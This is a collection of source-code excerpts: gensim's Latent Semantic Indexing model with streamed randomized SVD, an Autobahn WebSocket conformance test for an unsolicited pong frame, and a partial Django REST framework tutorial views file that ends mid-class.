        self.m, self.k = m, k
        self.power_iters = power_iters
        self.extra_dims = extra_dims
        if docs is not None:
            # base case decomposition: given a job `docs`, compute its decomposition,
            # *in-core*.
            if not use_svdlibc:
                # chunksize=sys.maxsize => treat the whole job as one chunk
                u, s = stochastic_svd(
                    docs, k, chunksize=sys.maxsize,
                    num_terms=m, power_iters=self.power_iters,
                    extra_dims=self.extra_dims)
            else:
                try:
                    import sparsesvd
                except ImportError:
                    raise ImportError("`sparsesvd` module requested but not found; run `easy_install sparsesvd`")
                logger.info("computing sparse SVD of %s matrix", str(docs.shape))
                if not scipy.sparse.issparse(docs):
                    docs = matutils.corpus2csc(docs)
                ut, s, vt = sparsesvd.sparsesvd(docs, k + 30)  # ask for extra factors, because for some reason SVDLIBC sometimes returns fewer factors than requested
                u = ut.T
                del ut, vt
            # drop numerically-insignificant tail factors before storing
            k = clip_spectrum(s**2, self.k)
            self.u = u[:, :k].copy()
            self.s = s[:k].copy()
        else:
            self.u, self.s = None, None

    def empty_like(self):
        # Fresh, empty projection with the same dimensions/accuracy settings.
        return Projection(self.m, self.k, power_iters=self.power_iters, extra_dims=self.extra_dims)

    def merge(self, other, decay=1.0):
        """
        Merge this Projection with another.

        The content of `other` is destroyed in the process, so pass this function a
        copy of `other` if you need it further.

        `decay` < 1.0 down-weights this (older) projection relative to `other`.
        """
        if other.u is None:
            # the other projection is empty => do nothing
            return
        if self.u is None:
            # we are empty => result of merge is the other projection, whatever it is
            self.u = other.u.copy()
            self.s = other.s.copy()
            return
        if self.m != other.m:
            raise ValueError("vector space mismatch: update is using %s features, expected %s" %
                             (other.m, self.m))
        logger.info("merging projections: %s + %s", str(self.u.shape), str(other.u.shape))
        m, n1, n2 = self.u.shape[0], self.u.shape[1], other.u.shape[1]
        # TODO Maybe keep the bases as elementary reflectors, without
        # forming explicit matrices with ORGQR.
        # The only operation we ever need is basis^T*basis ond basis*component.
        # But how to do that in scipy? And is it fast(er)?

        # find component of u2 orthogonal to u1
        logger.debug("constructing orthogonal component")
        self.u = asfarray(self.u, 'self.u')
        c = np.dot(self.u.T, other.u)
        self.u = ascarray(self.u, 'self.u')
        other.u -= np.dot(self.u, c)

        other.u = [other.u]  # do some reference magic and call qr_destroy, to save RAM
        q, r = matutils.qr_destroy(other.u)  # q, r = QR(component)
        assert not other.u

        # find the rotation that diagonalizes r
        k = np.bmat([[np.diag(decay * self.s), np.multiply(c, other.s)],
                     [matutils.pad(np.array([]).reshape(0, 0), min(m, n2), n1), np.multiply(r, other.s)]])
        logger.debug("computing SVD of %s dense matrix", k.shape)
        try:
            # in np < 1.1.0, running SVD sometimes results in "LinAlgError: SVD did not converge'.
            # for these early versions of np, catch the error and try to compute
            # SVD again, but over k*k^T.
            # see http://www.mail-archive.com/np-discussion@scipy.org/msg07224.html and
            # bug ticket http://projects.scipy.org/np/ticket/706
            # sdoering: replaced np's linalg.svd with scipy's linalg.svd:
            u_k, s_k, _ = scipy.linalg.svd(k, full_matrices=False)  # TODO *ugly overkill*!! only need first self.k SVD factors... but there is no LAPACK wrapper for partial svd/eigendecomp in np :( //sdoering: maybe there is one in scipy?
        except scipy.linalg.LinAlgError:
            logger.error("SVD(A) failed; trying SVD(A * A^T)")
            u_k, s_k, _ = scipy.linalg.svd(np.dot(k, k.T), full_matrices=False)  # if this fails too, give up with an exception
            s_k = np.sqrt(s_k)  # go back from eigen values to singular values

        k = clip_spectrum(s_k**2, self.k)
        u1_k, u2_k, s_k = np.array(u_k[:n1, :k]), np.array(u_k[n1:, :k]), s_k[:k]

        # update & rotate current basis U = [U, U']*[U1_k, U2_k]
        logger.debug("updating orthonormal basis U")
        self.s = s_k
        self.u = ascarray(self.u, 'self.u')
        self.u = np.dot(self.u, u1_k)

        q = ascarray(q, 'q')
        q = np.dot(q, u2_k)
        self.u += q

        # make each column of U start with a non-negative number (to force canonical decomposition)
        if self.u.shape[0] > 0:
            for i in xrange(self.u.shape[1]):
                if self.u[0, i] < 0.0:
                    self.u[:, i] *= -1.0
        # diff = np.dot(self.u.T, self.u) - np.eye(self.u.shape[1])
        # logger.info('orth error after=%f' % np.sum(diff * diff))
#endclass Projection
class LsiModel(interfaces.TransformationABC, basemodel.BaseTopicModel):
    """
    Objects of this class allow building and maintaining a model for Latent
    Semantic Indexing (also known as Latent Semantic Analysis).

    The main methods are:

    1. constructor, which initializes the projection into latent topics space,
    2. the ``[]`` method, which returns representation of any input document in the
       latent space,
    3. `add_documents()` for incrementally updating the model with new documents.

    The left singular vectors are stored in `lsi.projection.u`, singular values
    in `lsi.projection.s`. Right singular vectors can be reconstructed from the output
    of `lsi[training_corpus]`, if needed. See also FAQ [2]_.

    Model persistency is achieved via its load/save methods.

    .. [2] https://github.com/piskvorky/gensim/wiki/Recipes-&-FAQ#q4-how-do-you-output-the-u-s-vt-matrices-of-lsi
    """

    def __init__(self, corpus=None, num_topics=200, id2word=None, chunksize=20000,
                 decay=1.0, distributed=False, onepass=True,
                 power_iters=P2_EXTRA_ITERS, extra_samples=P2_EXTRA_DIMS):
        """
        `num_topics` is the number of requested factors (latent dimensions).

        After the model has been trained, you can estimate topics for an
        arbitrary, unseen document, using the ``topics = self[document]`` dictionary
        notation. You can also add new training documents, with ``self.add_documents``,
        so that training can be stopped and resumed at any time, and the
        LSI transformation is available at any point.

        If you specify a `corpus`, it will be used to train the model. See the
        method `add_documents` for a description of the `chunksize` and `decay` parameters.

        Turn `onepass` off to force a multi-pass stochastic algorithm.

        `power_iters` and `extra_samples` affect the accuracy of the stochastic
        multi-pass algorithm, which is used either internally (`onepass=True`) or
        as the front-end algorithm (`onepass=False`). Increasing the number of
        power iterations improves accuracy, but lowers performance. See [3]_ for
        some hard numbers.

        Turn on `distributed` to enable distributed computing.

        Example:

        >>> lsi = LsiModel(corpus, num_topics=10)
        >>> print(lsi[doc_tfidf]) # project some document into LSI space
        >>> lsi.add_documents(corpus2) # update LSI on additional documents
        >>> print(lsi[doc_tfidf])

        .. [3] http://nlp.fi.muni.cz/~xrehurek/nips/rehurek_nips.pdf
        """
        self.id2word = id2word
        self.num_topics = int(num_topics)
        self.chunksize = int(chunksize)
        self.decay = float(decay)
        if distributed:
            # the multi-pass algo is not distributed; fall back to one-pass
            if not onepass:
                logger.warning("forcing the one-pass algorithm for distributed LSA")
                onepass = True
        self.onepass = onepass
        self.extra_samples, self.power_iters = extra_samples, power_iters

        if corpus is None and self.id2word is None:
            raise ValueError('at least one of corpus/id2word must be specified, to establish input space dimensionality')

        if self.id2word is None:
            logger.warning("no word id mapping provided; initializing from corpus, assuming identity")
            self.id2word = utils.dict_from_corpus(corpus)
            self.num_terms = len(self.id2word)
        else:
            # NOTE(review): under Python 3, dict.keys() is a view and
            # `[-1] + view` raises TypeError; the rest of this module uses
            # six/xrange for py2+py3 compatibility, so this line looks like
            # a py3 incompatibility -- confirm and wrap in list() if so.
            self.num_terms = 1 + max([-1] + self.id2word.keys())

        self.docs_processed = 0
        self.projection = Projection(self.num_terms, self.num_topics, power_iters=self.power_iters, extra_dims=self.extra_samples)

        self.numworkers = 1
        if not distributed:
            logger.info("using serial LSI version on this node")
            self.dispatcher = None
        else:
            if not onepass:
                raise NotImplementedError("distributed stochastic LSA not implemented yet; "
                                          "run either distributed one-pass, or serial randomized.")
            try:
                import Pyro4
                # locate the cluster dispatcher via the Pyro name server
                dispatcher = Pyro4.Proxy('PYRONAME:gensim.lsi_dispatcher')
                logger.debug("looking for dispatcher at %s", str(dispatcher._pyroUri))
                dispatcher.initialize(id2word=self.id2word, num_topics=num_topics,
                                      chunksize=chunksize, decay=decay,
                                      power_iters=self.power_iters, extra_samples=self.extra_samples,
                                      distributed=False, onepass=onepass)
                self.dispatcher = dispatcher
                self.numworkers = len(dispatcher.getworkers())
                logger.info("using distributed version with %i workers", self.numworkers)
            except Exception as err:
                # distributed version was specifically requested, so this is an error state
                logger.error("failed to initialize distributed LSI (%s)", err)
                raise RuntimeError("failed to initialize distributed LSI (%s)" % err)

        if corpus is not None:
            self.add_documents(corpus)

    def add_documents(self, corpus, chunksize=None, decay=None):
        """
        Update singular value decomposition to take into account a new
        corpus of documents.

        Training proceeds in chunks of `chunksize` documents at a time. The size of
        `chunksize` is a tradeoff between increased speed (bigger `chunksize`)
        vs. lower memory footprint (smaller `chunksize`). If the distributed mode
        is on, each chunk is sent to a different worker/computer.

        Setting `decay` < 1.0 causes re-orientation towards new data trends in the
        input document stream, by giving less emphasis to old observations. This allows
        LSA to gradually "forget" old observations (documents) and give more
        preference to new ones.
        """
        logger.info("updating model with new documents")

        # get computation parameters; if not specified, use the ones from constructor
        if chunksize is None:
            chunksize = self.chunksize
        if decay is None:
            decay = self.decay

        if not scipy.sparse.issparse(corpus):
            if not self.onepass:
                # we are allowed multiple passes over the input => use a faster, randomized two-pass algo
                update = Projection(self.num_terms, self.num_topics, None)
                update.u, update.s = stochastic_svd(
                    corpus, self.num_topics,
                    num_terms=self.num_terms, chunksize=chunksize,
                    extra_dims=self.extra_samples, power_iters=self.power_iters)
                self.projection.merge(update, decay=decay)
                self.docs_processed += len(corpus) if hasattr(corpus, '__len__') else 0
            else:
                # the one-pass algo
                doc_no = 0
                if self.dispatcher:
                    logger.info('initializing %s workers', self.numworkers)
                    self.dispatcher.reset()
                for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
                    logger.info("preparing a new chunk of documents")
                    nnz = sum(len(doc) for doc in chunk)
                    # construct the job as a sparse matrix, to minimize memory overhead
                    # definitely avoid materializing it as a dense matrix!
                    logger.debug("converting corpus to csc format")
                    job = matutils.corpus2csc(chunk, num_docs=len(chunk), num_terms=self.num_terms, num_nnz=nnz)
                    del chunk
                    doc_no += job.shape[1]
                    if self.dispatcher:
                        # distributed version: add this job to the job queue, so workers can work on it
                        logger.debug("creating job #%i", chunk_no)
                        self.dispatcher.putjob(job)  # put job into queue; this will eventually block, because the queue has a small finite size
                        del job
                        logger.info("dispatched documents up to #%s", doc_no)
                    else:
                        # serial version, there is only one "worker" (myself) => process the job directly
                        update = Projection(self.num_terms, self.num_topics, job, extra_dims=self.extra_samples, power_iters=self.power_iters)
                        del job
                        self.projection.merge(update, decay=decay)
                        del update
                        logger.info("processed documents up to #%s", doc_no)
                        self.print_topics(5)

                # wait for all workers to finish (distributed version only)
                if self.dispatcher:
                    logger.info("reached the end of input; now waiting for all remaining jobs to finish")
                    self.projection = self.dispatcher.getstate()
                self.docs_processed += doc_no
            # logger.info("top topics after adding %i documents" % doc_no)
            # self.print_debug(10)
        else:
            # a scipy.sparse matrix was passed in directly => one in-core job
            assert not self.dispatcher, "must be in serial mode to receive jobs"
            assert self.onepass, "distributed two-pass algo not supported yet"
            update = Projection(self.num_terms, self.num_topics, corpus.tocsc(), extra_dims=self.extra_samples, power_iters=self.power_iters)
            self.projection.merge(update, decay=decay)
            logger.info("processed sparse job of %i documents", corpus.shape[1])
            self.docs_processed += corpus.shape[1]

    def __str__(self):
        # Human-readable summary of the model's hyperparameters.
        return "LsiModel(num_terms=%s, num_topics=%s, decay=%s, chunksize=%s)" % (
            self.num_terms, self.num_topics, self.decay, self.chunksize)

    def __getitem__(self, bow, scaled=False, chunksize=512):
        """
        Return latent representation, as a list of (topic_id, topic_value) 2-tuples.

        This is done by folding input document into the latent topic space.

        If `scaled` is set, scale topics by the inverse of singular values (default: no scaling).
        """
        assert self.projection.u is not None, "decomposition not initialized yet"

        # if the input vector is in fact a corpus, return a transformed corpus as a result
        is_corpus, bow = utils.is_corpus(bow)
        if is_corpus and chunksize:
            # by default, transform `chunksize` documents at once, when called as `lsi[corpus]`.
            # this chunking is completely transparent to the user, but it speeds
            # up internal computations (one mat * mat multiplication, instead of
            # `chunksize` smaller mat * vec multiplications).
            return self._apply(bow, chunksize=chunksize)

        if not is_corpus:
            bow = [bow]

        # convert input to scipy.sparse CSC, then do "sparse * dense = dense" multiplication
        vec = matutils.corpus2csc(bow, num_terms=self.num_terms, dtype=self.projection.u.dtype)
        topic_dist = (vec.T * self.projection.u[:, :self.num_topics]).T  # (x^T * u).T = u^-1 * x

        # # convert input to dense, then do dense * dense multiplication
        # # ± same performance as above (BLAS dense * dense is better optimized than scipy.sparse), but consumes more memory
        # vec = matutils.corpus2dense(bow, num_terms=self.num_terms, num_docs=len(bow))
        # topic_dist = np.dot(self.projection.u[:, :self.num_topics].T, vec)

        # # use np's advanced indexing to simulate sparse * dense
        # # ± same speed again
        # u = self.projection.u[:, :self.num_topics]
        # topic_dist = np.empty((u.shape[1], len(bow)), dtype=u.dtype)
        # for vecno, vec in enumerate(bow):
        #     indices, data = zip(*vec) if vec else ([], [])
        #     topic_dist[:, vecno] = np.dot(u.take(indices, axis=0).T, np.array(data, dtype=u.dtype))

        if not is_corpus:
            # convert back from matrix into a 1d vec
            topic_dist = topic_dist.reshape(-1)

        if scaled:
            topic_dist = (1.0 / self.projection.s[:self.num_topics]) * topic_dist  # s^-1 * u^-1 * x

        # convert a np array to gensim sparse vector = tuples of (feature_id, feature_weight),
        # with no zero weights.
        if not is_corpus:
            # lsi[single_document]
            result = matutils.full2sparse(topic_dist)
        else:
            # lsi[chunk of documents]
            result = matutils.Dense2Corpus(topic_dist)
        return result

    def show_topic(self, topicno, topn=10):
        """
        Return a specified topic (=left singular vector), 0 <= `topicno` < `self.num_topics`,
        as a string.

        Return only the `topn` words which contribute the most to the direction
        of the topic (both negative and positive).

        >>> lsimodel.show_topic(10, topn=5)
        [("category", -0.340), ("$M$", 0.298), ("algebra", 0.183), ("functor", -0.174), ("operator", -0.168)]
        """
        # size of the projection matrix can actually be smaller than `self.num_topics`,
        # if there were not enough factors (real rank of input matrix smaller than
        # `self.num_topics`). in that case, return an empty string
        if topicno >= len(self.projection.u.T):
            return ''
        c = np.asarray(self.projection.u.T[topicno, :]).flatten()
        # L2 norm of the topic vector, used to normalize the reported weights
        norm = np.sqrt(np.sum(np.dot(c, c)))
        most = matutils.argsort(np.abs(c), topn, reverse=True)
        return [(self.id2word[val], 1.0 * c[val] / norm) for val in most]

    def show_topics(self, num_topics=-1, num_words=10, log=False, formatted=True):
        """
        Return `num_topics` most significant topics (return all by default).
        For each topic, show `num_words` most significant words (10 words by default).

        The topics are returned as a list -- a list of strings if `formatted` is
        True, or a list of `(word, probability)` 2-tuples if False.

        If `log` is True, also output this result to log.
        """
        shown = []
        if num_topics < 0:
            num_topics = self.num_topics
        for i in xrange(min(num_topics, self.num_topics)):
            if i < len(self.projection.s):
                if formatted:
                    topic = self.print_topic(i, topn=num_words)
                else:
                    topic = self.show_topic(i, topn=num_words)
                shown.append((i, topic))
                if log:
                    logger.info("topic #%i(%.3f): %s", i, self.projection.s[i], topic)
        return shown

    def print_debug(self, num_topics=5, num_words=10):
        """
        Print (to log) the most salient words of the first `num_topics` topics.

        Unlike `print_topics()`, this looks for words that are significant for a
        particular topic *and* not for others. This *should* result in a more
        human-interpretable description of topics.
        """
        # only wrap the module-level fnc
        print_debug(
            self.id2word, self.projection.u, self.projection.s,
            range(min(num_topics, len(self.projection.u.T))),
            num_words=num_words
        )

    def save(self, fname, *args, **kwargs):
        """
        Save the model to file.

        Large internal arrays may be stored into separate files, with `fname` as prefix.

        Note: do not save as a compressed file if you intend to load the file back with `mmap`.
        """
        # the (potentially huge) projection arrays are saved separately, and
        # excluded (along with the unpicklable dispatcher) from the main pickle
        if self.projection is not None:
            self.projection.save(utils.smart_extension(fname, '.projection'), *args, **kwargs)
        super(LsiModel, self).save(fname, *args, ignore=['projection', 'dispatcher'], **kwargs)

    @classmethod
    def load(cls, fname, *args, **kwargs):
        """
        Load a previously saved object from file (also see `save`).

        Large arrays can be memmap'ed back as read-only (shared memory) by setting `mmap='r'`:

            >>> LsiModel.load(fname, mmap='r')
        """
        kwargs['mmap'] = kwargs.get('mmap', None)
        result = super(LsiModel, cls).load(fname, *args, **kwargs)
        projection_fname = utils.smart_extension(fname, '.projection')
        try:
            result.projection = super(LsiModel, cls).load(projection_fname, *args, **kwargs)
        except Exception as e:
            # a model saved without its projection is still usable for inspection
            logging.warning("failed to load projection from %s: %s" % (projection_fname, e))
        return result
#endclass LsiModel
def print_debug(id2token, u, s, topics, num_words=10, num_neg=None):
    """Log the `num_words` most *salient* words of each topic in `topics`.

    Salience here is each word's weight in the topic relative to the word's
    overall vector norm across all topics, so words that are specific to a
    topic rank above globally frequent ones. `u`, `s` are the left singular
    vectors and singular values; `id2token` maps word ids to strings.
    """
    if num_neg is None:
        # by default, print half as many salient negative words as positive
        # (note: true division => float under Python 3; only ever used in a
        # `len(neg) >= num_neg` comparison, so that still works)
        num_neg = num_words / 2

    logger.info('computing word-topic salience for %i topics', len(topics))
    topics, result = set(topics), {}
    # TODO speed up by block computation
    for uvecno, uvec in enumerate(u):
        uvec = np.abs(np.asarray(uvec).flatten())
        # relative contribution of this word to each topic
        udiff = uvec / np.sqrt(np.sum(np.dot(uvec, uvec)))
        for topic in topics:
            result.setdefault(topic, []).append((udiff[topic], uvecno))

    logger.debug("printing %i+%i salient words", num_words, num_neg)
    for topic in sorted(iterkeys(result)):
        weights = sorted(result[topic], key=lambda x: -abs(x[0]))
        _, most = weights[0]
        if u[most, topic] < 0.0:  # the most significant word has a negative sign => flip sign of u[most]
            normalize = -1.0
        else:
            normalize = 1.0

        # order features according to salience; ignore near-zero entries in u
        pos, neg = [], []
        for weight, uvecno in weights:
            if normalize * u[uvecno, topic] > 0.0001:
                pos.append('%s(%.3f)' % (id2token[uvecno], u[uvecno, topic]))
                if len(pos) >= num_words:
                    break

        for weight, uvecno in weights:
            if normalize * u[uvecno, topic] < -0.0001:
                neg.append('%s(%.3f)' % (id2token[uvecno], u[uvecno, topic]))
                if len(neg) >= num_neg:
                    break

        logger.info('topic #%s(%.3f): %s, ..., %s', topic, s[topic], ', '.join(pos), ', '.join(neg))
def stochastic_svd(corpus, rank, num_terms, chunksize=20000, extra_dims=None,
                   power_iters=0, dtype=np.float64, eps=1e-6):
    """
    Run truncated Singular Value Decomposition (SVD) on a sparse input.

    Return (U, S): the left singular vectors and the singular values of the input
    data stream `corpus` [4]_. The corpus may be larger than RAM (iterator of vectors).

    This may return less than the requested number of top `rank` factors, in case
    the input itself is of lower rank. The `extra_dims` (oversampling) and especially
    `power_iters` (power iterations) parameters affect accuracy of the decomposition.

    This algorithm uses `2+power_iters` passes over the input data. In case you can only
    afford a single pass, set `onepass=True` in :class:`LsiModel` and avoid using
    this function directly.

    The decomposition algorithm is based on
    **Halko, Martinsson, Tropp. Finding structure with randomness, 2009.**

    .. [4] If `corpus` is a scipy.sparse matrix instead, it is assumed the whole
       corpus fits into core memory and a different (more efficient) code path is chosen.
    """
    rank = int(rank)
    if extra_dims is None:
        samples = max(10, 2 * rank)  # use more samples than requested factors, to improve accuracy
    else:
        samples = rank + int(extra_dims)
    logger.info("using %i extra samples and %i power iterations", samples - rank, power_iters)

    num_terms = int(num_terms)

    # first phase: construct the orthonormal action matrix Q = orth(Y) = orth((A * A.T)^q * A * O)
    # build Y in blocks of `chunksize` documents (much faster than going one-by-one
    # and more memory friendly than processing all documents at once)
    y = np.zeros(dtype=dtype, shape=(num_terms, samples))
    logger.info("1st phase: constructing %s action matrix", str(y.shape))

    if scipy.sparse.issparse(corpus):
        # in-core path: the whole corpus is a single sparse matrix
        m, n = corpus.shape
        assert num_terms == m, "mismatch in number of features: %i in sparse matrix vs. %i parameter" % (m, num_terms)
        o = np.random.normal(0.0, 1.0, (n, samples)).astype(y.dtype)  # draw a random gaussian matrix
        sparsetools.csc_matvecs(m, n, samples, corpus.indptr, corpus.indices,
                                corpus.data, o.ravel(), y.ravel())  # y = corpus * o
        del o

        # unlike np, scipy.sparse `astype()` copies everything, even if there is no change to dtype!
        # so check for equal dtype explicitly, to avoid the extra memory footprint if possible
        if y.dtype != dtype:
            y = y.astype(dtype)

        logger.info("orthonormalizing %s action matrix", str(y.shape))
        y = [y]
        q, _ = matutils.qr_destroy(y)  # orthonormalize the range

        logger.debug("running %i power iterations", power_iters)
        for power_iter in xrange(power_iters):
            q = corpus.T * q
            q = [corpus * q]
            q, _ = matutils.qr_destroy(q)  # orthonormalize the range after each power iteration step
    else:
        # streamed path: accumulate y = A * O chunk by chunk
        num_docs = 0
        for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
            logger.info('PROGRESS: at document #%i', (chunk_no * chunksize))
            # construct the chunk as a sparse matrix, to minimize memory overhead
            # definitely avoid materializing it as a dense (num_terms x chunksize) matrix!
            # NOTE(review): `s` is computed but never used below -- looks like
            # a leftover (possibly once fed to corpus2csc's num_nnz); confirm.
            s = sum(len(doc) for doc in chunk)
            chunk = matutils.corpus2csc(chunk, num_terms=num_terms, dtype=dtype)  # documents = columns of sparse CSC
            m, n = chunk.shape
            assert m == num_terms
            assert n <= chunksize  # the very last chunk of A is allowed to be smaller in size
            num_docs += n
            logger.debug("multiplying chunk * gauss")
            o = np.random.normal(0.0, 1.0, (n, samples)).astype(dtype)  # draw a random gaussian matrix
            sparsetools.csc_matvecs(m, n, samples, chunk.indptr, chunk.indices,  # y = y + chunk * o
                                    chunk.data, o.ravel(), y.ravel())
            del chunk, o
        y = [y]
        q, _ = matutils.qr_destroy(y)  # orthonormalize the range
        for power_iter in xrange(power_iters):
            logger.info("running power iteration #%i", power_iter + 1)
            yold = q.copy()
            q[:] = 0.0
            for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
                logger.info('PROGRESS: at document #%i/%i', chunk_no * chunksize, num_docs)
                chunk = matutils.corpus2csc(chunk, num_terms=num_terms, dtype=dtype)  # documents = columns of sparse CSC
                tmp = chunk.T * yold
                tmp = chunk * tmp
                del chunk
                q += tmp
            del yold
            q = [q]
            q, _ = matutils.qr_destroy(q)  # orthonormalize the range

    qt = q[:, :samples].T.copy()
    del q

    if scipy.sparse.issparse(corpus):
        # in-core second phase: project and decompose B = Q.T * A directly
        b = qt * corpus
        logger.info("2nd phase: running dense svd on %s matrix" % str(b.shape))
        u, s, vt = scipy.linalg.svd(b, full_matrices=False)
        del b, vt
    else:
        # second phase: construct the covariance matrix X = B * B.T, where B = Q.T * A
        # again, construct X incrementally, in chunks of `chunksize` documents from the streaming
        # input corpus A, to avoid using O(number of documents) memory
        x = np.zeros(shape=(qt.shape[0], qt.shape[0]), dtype=np.float64)
        logger.info("2nd phase: constructing %s covariance matrix", str(x.shape))
        for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize)):
            logger.info('PROGRESS: at document #%i/%i', chunk_no * chunksize, num_docs)
            chunk = matutils.corpus2csc(chunk, num_terms=num_terms, dtype=qt.dtype)
            b = qt * chunk  # dense * sparse matrix multiply
            del chunk
            x += np.dot(b, b.T)  # TODO should call the BLAS routine SYRK, but there is no SYRK wrapper in scipy :(
            del b

        # now we're ready to compute decomposition of the small matrix X
        logger.info("running dense decomposition on %s covariance matrix", str(x.shape))
        u, s, vt = scipy.linalg.svd(x)  # could use linalg.eigh, but who cares... and svd returns the factors already sorted :)
        s = np.sqrt(s)  # sqrt to go back from singular values of X to singular values of B = singular values of the corpus
    q = qt.T.copy()
    del qt

    logger.info("computing the final decomposition")
    # drop the numerically-insignificant tail of the spectrum
    keep = clip_spectrum(s**2, rank, discard=eps)
    u = u[:, :keep].copy()
    s = s[:keep]
    # rotate the small-space factors back into the original term space
    u = np.dot(q, u)
    return u.astype(dtype), s.astype(dtype)
| akutuzov/gensim | gensim/models/lsimodel.py | Python | lgpl-2.1 | 34,447 |
###############################################################################
##
## Copyright (c) Crossbar.io Technologies GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case2_7(Case):
    """Autobahn test case 2.7: unsolicited pong frame without payload."""

    DESCRIPTION = """Send unsolicited pong without payload. Verify nothing is received. Clean close with normal code."""

    EXPECTATION = """Nothing."""

    def onOpen(self):
        # An unsolicited pong must be silently ignored by the peer
        # (RFC 6455, section 5.5.3), so we expect no frames in response.
        self.expected[Case.OK] = []
        self.expectedClose = {"closedByMe":True,"closeCode":[self.p.CLOSE_STATUS_CODE_NORMAL],"requireClean":True}
        # opcode 10 = pong; no payload
        self.p.sendFrame(opcode = 10)
        self.p.sendClose(self.p.CLOSE_STATUS_CODE_NORMAL)
        # allow one second for any (non-conforming) response before closing
        self.p.closeAfter(1)
| tavendo/AutobahnTestSuite | autobahntestsuite/autobahntestsuite/case/case2_7.py | Python | apache-2.0 | 1,300 |
from snippets.models import Snippet
from snippets.serializers import SnippetSerializer, UserSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import mixins
from rest_framework import generics
from django.contrib.auth.models import User
from rest_framework import permissions
from snippets.permissions import IsOwnerOrReadOnly
from rest_framework.decorators import api_view
from rest_framework.reverse import reverse
from rest_framework import renderers
from rest_framework import viewsets
from rest_framework.decorators import link
#-- Root API --------------------------------------------------------------------------------------
# Not required when using Routers
#@api_view(('GET',))
#def api_root(request, format=None):
# return Response({
# 'users': reverse('user-list', request=request, format=format),
# 'snippets': reverse('snippet-list', request=request, format=format)
# })
#--------------------------------------------------------------------------------------------------
#-- Users endpoint --------------------------------------------------------------------------------
#### Regular views
#class UserList(generics.ListAPIView):
# queryset = User.objects.all()
# serializer_class = UserSerializer
#
#
#class UserDetail(generics.RetrieveAPIView):
# queryset = User.objects.all()
# serializer_class = UserSerializer
#
#### ViewSets
class UserViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only endpoint for users.

    Being a ``ReadOnlyModelViewSet``, this automatically provides the
    `list` and `detail` actions and nothing else.
    """

    serializer_class = UserSerializer
    queryset = User.objects.all()
#--------------------------------------------------------------------------------------------------
#-- Snippets endpoint -----------------------------------------------------------------------------
#### Base class view
#class SnippetList(APIView):
# """
# List all snippets, or create a new snippet.
# """
# def get(self, request, format=None):
# snippets = Snippet.objects.all()
# serializer = SnippetSerializer(snippets, many=True)
# return Response(serializer.data)
#
# def post(self, request, format=None):
# serializer = SnippetSerializer(data=request.DATA)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
#### Generic base class view w/ mixins
#class SnippetList(mixins.ListModelMixin,
# mixins.CreateModelMixin,
# generics.GenericAPIView):
# # `queryset` and `serializer_class` added by `GenericAPIView`.
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# def get(self, request, *args, **kwargs):
# # `list` method provided by `mixins.ListModelMixin`.
# return self.list(request, *args, **kwargs)
#
# def post(self, request, *args, **kwargs):
# # `create` method provided by `mixins.CreateModelMixin`.
# return self.create(request, *args, **kwargs)
#
#### Generic class view w/ list and create features
#class SnippetList(generics.ListCreateAPIView):
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# permission_classes = (permissions.IsAuthenticatedOrReadOnly,)
#
# def pre_save(self, obj):
# obj.owner = self.request.user
#### Base class view
#class SnippetDetail(APIView):
# """
# Retrieve, update or delete a snippet instance.
# """
# def get_object(self, pk):
# try:
# return Snippet.objects.get(pk=pk)
# except Snippet.DoesNotExist:
# raise Http404
#
# def get(self, request, pk, format=None):
# snippet = self.get_object(pk)
# serializer = SnippetSerializer(snippet)
# return Response(serializer.data)
#
# def put(self, request, pk, format=None):
# snippet = self.get_object(pk)
# serializer = SnippetSerializer(snippet, data=request.DATA)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
# def delete(self, request, pk, format=None):
# snippet = self.get_object(pk)
# snippet.delete()
# return Response(status=status.HTTP_204_NO_CONTENT)
#
#### Generic base class view w/ mixins
#class SnippetDetail(mixins.RetrieveModelMixin,
# mixins.UpdateModelMixin,
# mixins.DestroyModelMixin,
# generics.GenericAPIView):
# # `queryset` and `serializer_class` added by `GenericAPIView`.
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# def get(self, request, *args, **kwargs):
# # `retrieve` method provided by `mixins.RetrieveModelMixin`.
# return self.retrieve(request, *args, **kwargs)
#
# def put(self, request, *args, **kwargs):
# # `update` method provided by `mixins.UpdateModelMixin`.
# return self.update(request, *args, **kwargs)
#
# def delete(self, request, *args, **kwargs):
# # `destroy` method provided by mixins.DestroyModelMixin.
# return self.destroy(request, *args, **kwargs)
#
#### Generic class view w/ retrieve, update, destroy features
#class SnippetDetail(generics.RetrieveUpdateDestroyAPIView):
# queryset = Snippet.objects.all()
# serializer_class = SnippetSerializer
#
# permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,)
#
# def pre_save(self, obj):
# obj.owner = self.request.user
#--------------------------------------------------------------------------------------------------
#-- Snippets Highlights endpoint ---------------------------------------------------------------------------
#class SnippetHighlight(generics.GenericAPIView):
# """
# In this case we want to return a property (`highlighted`) of an object instance (a `Snippet`
# instance), not an object instance itself. So there is no existing concrete generic view that
# we can use, we need to use the base class for representing instances.
# """
# queryset = Snippet.objects.all()
# # We use this specific renderer because we want to return the static HTML code which is stored
# # in the `highlighted` attribute of a `Snippet` instance.
# renderer_classes = (renderers.StaticHTMLRenderer,)
#
# def get(self, request, *args, **kwargs):
# snippet = self.get_object()
# return Response(snippet.highlighted)
#--------------------------------------------------------------------------------------------------
#-- Unique Snippets endpoint w/ ViewSet -----------------------------------------------------------
class SnippetViewSet(viewsets.ModelViewSet):
    """
